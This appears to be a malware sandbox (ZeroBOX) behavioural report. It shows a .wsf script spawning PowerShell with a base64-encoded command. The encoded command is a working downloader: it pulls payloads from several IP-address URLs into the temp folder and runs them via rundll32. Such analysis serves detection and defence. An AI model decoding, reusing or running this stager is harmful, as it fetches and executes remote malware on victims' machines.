popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xI-Febuary.12(69).wsf

    2060

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcwBvAGYAdABpAHMAaABIAG8AbABvAHMAdABvAG0AYQB0AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBiAEMAcABnAEMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAEQASAA2AEQAUQBxAG0AdABxAGIAagBpAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AaQB5AGEATgBlAGIAUAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA1ADEALgAyADIAMgAuADEAOQA5AC4AMgA0ADQALwA1ADAAagBRADcASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8ATQBYADEAUgA1AHQASQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8AeABoAEgAZQBXAG8ATAAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAG8AdQB0AHAAaQBjAGsAZQB0ACAAaQBuACAAJABzAG8AZgB0AGkAcwBoAEgAbwBsAG8AcwB0AG8AbQBhAHQAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbwB1AHQAcABpAGMAawBlAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAaABhAG4AYwBlAGwAbwByAC4AYwBoAG8AbABlAGMAeQBzAHQAbwBsAGkAdABoAGkAYQBzAGkAcwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABDAGgAYQBuAGMAZQBsAG8AcgAuAGMAaABvAGwAZQBjAHkAcwB0AG8AbABpAHQAaABpAGEAcwBpAHMALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="

      2184

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf